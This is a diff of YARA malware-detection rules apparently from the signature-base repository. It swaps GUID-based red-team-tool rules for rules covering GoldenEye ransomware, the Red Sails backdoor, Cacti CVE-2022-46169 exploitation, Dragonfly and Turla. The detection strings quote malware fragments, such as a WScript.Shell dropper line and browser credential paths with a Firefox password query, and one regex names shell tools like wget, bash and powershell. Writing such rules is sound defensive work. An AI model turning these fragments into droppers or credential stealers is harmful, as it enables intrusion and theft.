-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "8d18f1d5-9c9a-5258-9f96-fa24b702c6ad"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/two06/Inception"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3165-L3179"
+		description = "GoldenEye XLS with Macro - file Schneider-Bewerbung.xls"
+		author = "Florian Roth (Nextron Systems)"
+		id = "6eafcc35-56ef-534f-884a-0bb47c27c274"
+		date = "2016-12-06"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/jp2SkT"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_goldeneye.yar#L10-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "333f2d92dad837ab1d9ce9bfbd0aac790026c9624d7f5e77c7a60fc6c4a72ca0"
+		logic_hash = "827c1d1c0f9c3ebd77413de7e1db5e29d05f2ece6676c79a79f6c1ff2788f42b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2320d4232ee80cc90bacd768ba52374a21d0773c39895b88cdcaa7782e16c441"
 
 	strings:
-		$typelibguid0lo = "03d96b8c-efd1-44a9-8db2-0b74db5d247a" ascii wide
-		$typelibguid0up = "03D96B8C-EFD1-44A9-8DB2-0B74DB5D247A" ascii wide
+		$x1 = "fso.GetTempName();tmp_path = tmp_path.replace('.tmp', '.exe')" fullword ascii
+		$x2 = "var shell = new ActiveXObject('WScript.Shell');shell.run(t'" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0xcfd0 and filesize < 4000KB and 1 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpwmi_1 : FILE
+rule SIGNATURE_BASE_Goldeneyeransomware_Dropper_Malformedzoomit : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "cd5a1c7b-a45a-5541-b1b0-cf19c991ed22"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		old_rule_name = "HKTL_NET_GUID_sharpwmi"
-		reference = "https://github.com/QAX-A-Team/sharpwmi"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3181-L3196"
+		description = "Auto-generated rule"
+		author = "Florian Roth (Nextron Systems)"
+		id = "6ebf2d13-7d58-5a1b-a836-66d533f408e8"
+		date = "2016-12-06"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/jp2SkT"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_goldeneye.yar#L26-L40"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "85e22c021c6d421e97d7ea811b3d3800c487a0185ddab6cb80b2d35cb97a73d7"
+		logic_hash = "c18405a272c9210973e3184b8267306919cba8795b12d5982a9e3e8f748f9782"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "b5ef16922e2c76b09edd71471dd837e89811c5e658406a8495c1364d0d9dc690"
 
 	strings:
-		$typelibguid0lo = "bb357d38-6dc1-4f20-a54c-d664bd20677e" ascii wide
-		$typelibguid0up = "BB357D38-6DC1-4F20-A54C-D664BD20677E" ascii wide
+		$s1 = "ZoomIt - Sysinternals: www.sysinternals.com" fullword ascii
+		$n1 = "Mark Russinovich" wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 800KB and $s1 and not $n1 )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_CVE_2019_1064 : FILE
+rule SIGNATURE_BASE_Redsails_EXE : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "4640e874-faa4-58dc-a3f3-18246a343f15"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/RythmStick/CVE-2019-1064"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3198-L3212"
+		description = "Detects Red Sails Hacktool by WinDivert references"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e7ebbebf-e2d6-5cd3-b859-b804d39d1641"
+		date = "2017-10-02"
+		modified = "2023-12-05"
+		reference = "https://github.com/BeetleChunks/redsails"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_redsails.yar#L11-L25"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d78b15454af39bca869c07a78550d2b3827ecdd03bcf02a8614e0c8247fcf5c1"
+		logic_hash = "fe9232989fb29686f11ee8cd59090fb6602301b00ff12d4a0dff8279a1718086"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "7a7861d25b0c038d77838ecbd5ea5674650ad4f5faf7432a6f3cfeb427433fac"
 
 	strings:
-		$typelibguid0lo = "ff97e98a-635e-4ea9-b2d0-1a13f6bdbc38" ascii wide
-		$typelibguid0up = "FF97E98A-635E-4EA9-B2D0-1A13F6BDBC38" ascii wide
+		$s1 = "bWinDivert64.dll" fullword ascii
+		$s2 = "bWinDivert32.dll" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 6000KB and all of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Tokenvator : FILE
+rule SIGNATURE_BASE_Redsails_PY
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "84ebb6b3-cf11-5172-95d4-d114bfeb0bc7"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/0xbadjuju/Tokenvator"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3214-L3228"
+		description = "Detects Red Sails Hacktool - Python"
+		author = "Florian Roth (Nextron Systems)"
+		id = "59d5e784-70ff-5061-9867-54c905ecfd8c"
+		date = "2017-10-02"
+		modified = "2023-12-05"
+		reference = "https://github.com/BeetleChunks/redsails"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_redsails.yar#L27-L45"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7bd3cc74ea70f247836ed4d0da9602b21e962c6b7b2d8fdf89c9c46ba919fc71"
+		logic_hash = "4c5426a427e2c25cf9e44ae5f9ec477c9ab11f611d9a0db444c36e7cae176562"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "6ebedff41992b9536fe9b1b704a29c8c1d1550b00e14055e3c6376f75e462661"
+		hash2 = "5ec20cb99030f48ba512cbc7998b943bebe49396b20cf578c26debbf14176e5e"
 
 	strings:
-		$typelibguid0lo = "4b2b3bd4-d28f-44cc-96b3-4a2f64213109" ascii wide
-		$typelibguid0up = "4B2B3BD4-D28F-44CC-96B3-4A2F64213109" ascii wide
+		$x1 = "Gained command shell on host" fullword ascii
+		$x2 = "[!] Received an ERROR in shell()" fullword ascii
+		$x3 = "Target IP address with backdoor installed" fullword ascii
+		$x4 = "Open backdoor port on target machine" fullword ascii
+		$x5 = "Backdoor port to open on victim machine" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Wheresmyimplant : FILE
+rule SIGNATURE_BASE_EXPL_LOG_Cacti_Commandinjection_CVE_2022_46169_Dec22_1 : CVE_2022_46169
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "c99523ce-e2c0-5a21-89d1-70c0dd970731"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/0xbadjuju/WheresMyImplant"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3230-L3244"
+		description = "Detects potential exploitation attempts that target the Cacti Command Injection CVE-2022-46169"
+		author = "Nasreddine Bencherchali"
+		id = "c799a419-87ed-55ea-8ebb-d4da901be4ad"
+		date = "2022-12-27"
+		modified = "2023-12-05"
+		reference = "https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_cve_2022_46169_cacti.yar#L1-L13"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0bc82dfd6e07f6ff8a9cb7b6331f3f600db30ee053592422d1eddaff3c46cfdf"
-		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		logic_hash = "6ccd3b830deb5c5d65519274c4c528203a2a14a177382334da87e288174e2cfe"
+		score = 70
+		quality = 60
+		tags = "CVE-2022-46169"
 
 	strings:
-		$typelibguid0lo = "cca59e4e-ce4d-40fc-965f-34560330c7e6" ascii wide
-		$typelibguid0up = "CCA59E4E-CE4D-40FC-965F-34560330C7E6" ascii wide
+		$xr1 = /\/remote_agent\.php.{1,300}(whoami|\/bin\/bash|\/bin\/sh|\bwget\b|powershell|cmd \/c|cmd\.exe \/c).{1,300} 200 / ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		$xr1
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Naga : FILE
+
+rule SIGNATURE_BASE_Unspecified_Malware_Sep1_A1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "3a9d3154-a8f1-57a4-8b61-498e2ebdfa42"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/byt3bl33d3r/Naga"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3246-L3262"
+		description = "Detects malware from DrqgonFly APT report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "cff49e85-c8c3-5240-9948-0551e38e7040"
+		date = "2017-09-12"
+		modified = "2023-12-05"
+		reference = "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_dragonfly.yar#L13-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ff115b2817926a072088d5077d2969028b64ce2306920fa3278cfe842246e747"
+		logic_hash = "d235dc964ac74d2b635251d07b2a9119b731a6c3c45b6b2a81ca88e6fc8b63b7"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-
-	strings:
-		$typelibguid0lo = "99428732-4979-47b6-a323-0bb7d6d07c95" ascii wide
-		$typelibguid0up = "99428732-4979-47B6-A323-0BB7D6D07C95" ascii wide
-		$typelibguid1lo = "a2c9488f-6067-4b17-8c6f-2d464e65c535" ascii wide
-		$typelibguid1up = "A2C9488F-6067-4B17-8C6F-2D464E65C535" ascii wide
+		hash1 = "28143c7638f22342bff8edcd0bedd708e265948a5fcca750c302e2dca95ed9f0"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and pe.imphash ( ) == "17a4bd9c95f2898add97f309fc6f9bcd" )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpbox : FILE
+rule SIGNATURE_BASE_Dragonfly_APT_Sep17_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "fda1a67f-d746-5ddb-a33f-97d608b13bc9"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/P1CKLES/SharpBox"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3264-L3278"
+		description = "Detects malware from DrqgonFly APT report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d219a54e-cb76-5c56-b64c-5019e811eeb1"
+		date = "2017-09-12"
+		modified = "2023-12-05"
+		reference = "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_dragonfly.yar#L29-L44"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "dba572c1c52bc887600e5e674403b3a43578ca43c8ea4d6b34530796ef1de0d0"
+		logic_hash = "c885fb690b7e047203529f0c4a6dd60dea822ce60a47e42b52d3216bc26da62e"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "fc54d8afd2ce5cb6cc53c46783bf91d0dd19de604308d536827320826bc36ed9"
 
 	strings:
-		$typelibguid0lo = "616c1afb-2944-42ed-9951-bf435cadb600" ascii wide
-		$typelibguid0up = "616C1AFB-2944-42ED-9951-BF435CADB600" ascii wide
+		$s1 = "\\Update\\Temp\\ufiles.txt" wide
+		$s2 = "%02d.%02d.%04d %02d:%02d" fullword wide
+		$s3 = "*pass*.*" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Rundotnetdll32 : FILE
+rule SIGNATURE_BASE_Dragonfly_APT_Sep17_2 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "266c8add-d2ca-5e46-8594-5d190447d133"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/0xbadjuju/rundotnetdll32"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3280-L3294"
+		description = "Detects malware from DrqgonFly APT report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e64f121d-a628-54b5-88f3-96eea388c155"
+		date = "2017-09-12"
+		modified = "2023-01-06"
+		reference = "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_dragonfly.yar#L46-L66"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8d20de93f5e9f0fce189130862153e533a79038d4fdaadb3d4216b6bd294ae05"
+		logic_hash = "433711dd15c8d1044b381046747194e47402288df06da6bbc61055dc9c90f52a"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "178348c14324bc0a3e57559a01a6ae6aa0cb4013aabbe324b51f906dcf5d537e"
 
 	strings:
-		$typelibguid0lo = "a766db28-94b6-4ed1-aef9-5200bbdd8ca7" ascii wide
-		$typelibguid0up = "A766DB28-94B6-4ED1-AEF9-5200BBDD8CA7" ascii wide
+		$s1 = "\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data" wide
+		$s2 = "C:\\Users\\Public\\Log.txt" fullword wide
+		$s3 = "SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins" fullword wide
+		$s4 = "***************** Mozilla Firefox ****************" fullword wide
+		$s5 = "********************** Opera *********************" fullword wide
+		$s6 = "\\AppData\\Local\\Microsoft\\Credentials\\" wide
+		$s7 = "\\Appdata\\Local\\Google\\Chrome\\User Data\\Default\\" wide
+		$s8 = "**************** Internet Explorer ***************" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 3000KB and 3 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Antidebug : FILE
+
+rule SIGNATURE_BASE_Dragonfly_APT_Sep17_3 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "f381081b-d0cb-593d-ad3d-28816f770b67"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/malcomvetter/AntiDebug"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3296-L3310"
+		description = "Detects malware from DrqgonFly APT report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4eafd732-80bc-5f50-bf0d-096df4d35d61"
+		date = "2017-09-12"
+		modified = "2023-12-05"
+		reference = "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_dragonfly.yar#L68-L89"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "32ae8a5221f3b1c913163590291461fe7868f25be02c3b0b045a4934d97d244a"
+		logic_hash = "f564685eb1426d1a3eb888a888bfdf3a8fa9bc96af07fb0bc5f10c0a324f1d9d"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "b051a5997267a5d7fa8316005124f3506574807ab2b25b037086e2e971564291"
 
 	strings:
-		$typelibguid0lo = "997265c1-1342-4d44-aded-67964a32f859" ascii wide
-		$typelibguid0up = "997265C1-1342-4D44-ADED-67964A32F859" ascii wide
+		$s1 = "kernel64.dll" fullword ascii
+		$s2 = "ws2_32.dQH" fullword ascii
+		$s3 = "HGFEDCBADCBA" fullword ascii
+		$s4 = "AWAVAUATWVSU" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 40KB and ( pe.imphash ( ) == "6f03fb864ff388bac8680ac5303584be" or all of them ) )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Dinvisibleregistry : FILE
+rule SIGNATURE_BASE_Dragonfly_APT_Sep17_4 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "98409bbe-6346-5825-b7f7-c1afeac2b038"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/NVISO-BE/DInvisibleRegistry"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3312-L3326"
+		description = "Detects malware from DrqgonFly APT report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "dbc0eebf-fc81-5a0b-b2e0-129d0b40b6f7"
+		date = "2017-09-12"
+		modified = "2023-12-05"
+		reference = "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_dragonfly.yar#L91-L109"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a14dca802a63983d1c3974a4c195fd7bd5f256ace03d4bcea2d88eef6958931b"
+		logic_hash = "61af81f0cd1eccba3a1000e6715c9715e8e67849e5edd4279728a7e47bd8cb75"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2f159b71183a69928ba8f26b76772ec504aefeac71021b012bd006162e133731"
 
 	strings:
-		$typelibguid0lo = "31d576fb-9fb9-455e-ab02-c78981634c65" ascii wide
-		$typelibguid0up = "31D576FB-9FB9-455E-AB02-C78981634C65" ascii wide
+		$s1 = "screen.exe" fullword wide
+		$s2 = "PlatformInvokeUSER32" fullword ascii
+		$s3 = "GetDesktopImageF" fullword ascii
+		$s4 = "PlatformInvokeGDI32" fullword ascii
+		$s5 = "GetDesktopImage" fullword ascii
+		$s6 = "Too many arguments, going to store in current dir" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 60KB and all of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Tikitorch : FILE
+rule SIGNATURE_BASE_Turla_APT_Srsvc : TURLA FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "354ee690-a0d0-5cc5-a73b-53b916ed0169"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/rasta-mouse/TikiTorch"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3328-L3354"
+		description = "Detects Turla malware (based on sample used in the RUAG APT case)"
+		author = "Florian Roth (Nextron Systems)"
+		id = "951ee9f8-1ab0-5fd5-be9b-053ec82f6ea2"
+		date = "2016-06-09"
+		modified = "2023-12-05"
+		reference = "https://www.govcert.admin.ch/blog/22/technical-report-about-the-ruag-espionage-case"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turla.yar#L10-L31"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "072129fea5e40b2fcbf13156ccf8c5a05e343b98f02dc7140261f6534a5b9e4e"
+		logic_hash = "76bd2aacde66114090d1c1767da64728219230964a0bc78a5d830819c46bac3a"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = "TURLA, FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		family = "Turla"
+		hash1 = "65996f266166dbb479a42a15a236e6564f0b322d5d68ee546244d7740a21b8f7"
+		hash2 = "25c7ff1eb16984a741948f2ec675ab122869b6edea3691b01d69842a53aa3bac"
 
 	strings:
-		$typelibguid0lo = "806c6c72-4adc-43d9-b028-6872fa48d334" ascii wide
-		$typelibguid0up = "806C6C72-4ADC-43D9-B028-6872FA48D334" ascii wide
-		$typelibguid1lo = "2ef9d8f7-6b77-4b75-822b-6a53a922c30f" ascii wide
-		$typelibguid1up = "2EF9D8F7-6B77-4B75-822B-6A53A922C30F" ascii wide
-		$typelibguid2lo = "8f5f3a95-f05c-4dce-8bc3-d0a0d4153db6" ascii wide
-		$typelibguid2up = "8F5F3A95-F05C-4DCE-8BC3-D0A0D4153DB6" ascii wide
-		$typelibguid3lo = "1f707405-9708-4a34-a809-2c62b84d4f0a" ascii wide
-		$typelibguid3up = "1F707405-9708-4A34-A809-2C62B84D4F0A" ascii wide
-		$typelibguid4lo = "97421325-b6d8-49e5-adf0-e2126abc17ee" ascii wide
-		$typelibguid4up = "97421325-B6D8-49E5-ADF0-E2126ABC17EE" ascii wide
-		$typelibguid5lo = "06c247da-e2e1-47f3-bc3c-da0838a6df1f" ascii wide
-		$typelibguid5up = "06C247DA-E2E1-47F3-BC3C-DA0838A6DF1F" ascii wide
-		$typelibguid6lo = "fc700ac6-5182-421f-8853-0ad18cdbeb39" ascii wide
-		$typelibguid6up = "FC700AC6-5182-421F-8853-0AD18CDBEB39" ascii wide
+		$x1 = "SVCHostServiceDll.dll" fullword ascii
+		$s2 = "msimghlp.dll" fullword wide
+		$s3 = "srservice" fullword wide
+		$s4 = "ModStart" fullword ascii
+		$s5 = "ModStop" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 20KB and ( 1 of ( $x* ) or all of ( $s* ) ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Hivejack : FILE
+rule SIGNATURE_BASE_Turla_APT_Malware_Gen1 : TURLA FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "10567ef4-780f-5e93-9061-3214116d6bbb"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/Viralmaniar/HiveJack"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3356-L3370"
+		description = "Detects Turla malware (based on sample used in the RUAG APT case)"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7ead2da1-3544-5a26-8767-6d3f29de8b96"
+		date = "2016-06-09"
+		modified = "2023-12-05"
+		reference = "https://www.govcert.admin.ch/blog/22/technical-report-about-the-ruag-espionage-case"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turla.yar#L33-L71"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "22ca377cc1f1d634564084e92e976e21df0cf8bf864cb772a49f740a6a429a4e"
+		logic_hash = "3676d01d5e4044fd49292eb7b4376ff90f0a41141f89a19b13c5518b01257be3"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = "TURLA, FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		family = "Turla"
+		hash1 = "0e1bf347c37fb199886f1e675e372ba55ac4627e8be2f05a76c2c64f9b6ed0e4"
+		hash2 = "7206075cd8f1004e8f1f759d46e98bfad4098b8642412811a214c0155a1f08b9"
+		hash3 = "fe3ffd7438c0d38484bf02a78a19ea81a6f51b4b3f2b2228bd21974c2538bbcd"
+		hash4 = "c49111af049dd9746c6b1980db6e150b2a79ca1569b23ed2cba81c85c00d82b4"
+		hash5 = "b62a643c96e2e41f639d2a8ce11d61e6b9d7fb3a9baf011120b7fec1b4ee3cf4"
+		hash6 = "edb12790b5cd959bc2e53a4b369a4fd747153e6c9d50f6a69ff047f7857a4348"
+		hash7 = "8f2ea0f916fda1dfb771f5441e919c561da5b6334b9f2fffcbf53db14063b24a"
+		hash8 = "8dddc744bbfcf215346c812aa569e49523996f73a1f22fe4e688084ce1225b98"
+		hash9 = "0c69258adcc97632b729e55664c22cd942812336d41e8ea0cff9ddcafaded20f"
+		hash10 = "2b4fba1ef06f85d1395945db40a9f2c3b3ed81b56fb9c2d5e5bb693c230215e2"
 
 	strings:
-		$typelibguid0lo = "e12e62fe-bea3-4989-bf04-6f76028623e3" ascii wide
-		$typelibguid0up = "E12E62FE-BEA3-4989-BF04-6F76028623E3" ascii wide
+		$x1 = "too long data for this type of transport" fullword ascii
+		$x2 = "not enough server resources to complete operation" fullword ascii
+		$x3 = "Task not execute. Arg file failed." fullword ascii
+		$x4 = "Global\\MSCTF.Shared.MUTEX.ZRX" fullword ascii
+		$s1 = "peer has closed the connection" fullword ascii
+		$s2 = "tcpdump.exe" fullword ascii
+		$s3 = "windump.exe" fullword ascii
+		$s4 = "dsniff.exe" fullword ascii
+		$s5 = "wireshark.exe" fullword ascii
+		$s6 = "ethereal.exe" fullword ascii
+		$s7 = "snoop.exe" fullword ascii
+		$s8 = "ettercap.exe" fullword ascii
+		$s9 = "miniport.dat" fullword ascii
+		$s10 = "net_password=%s" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
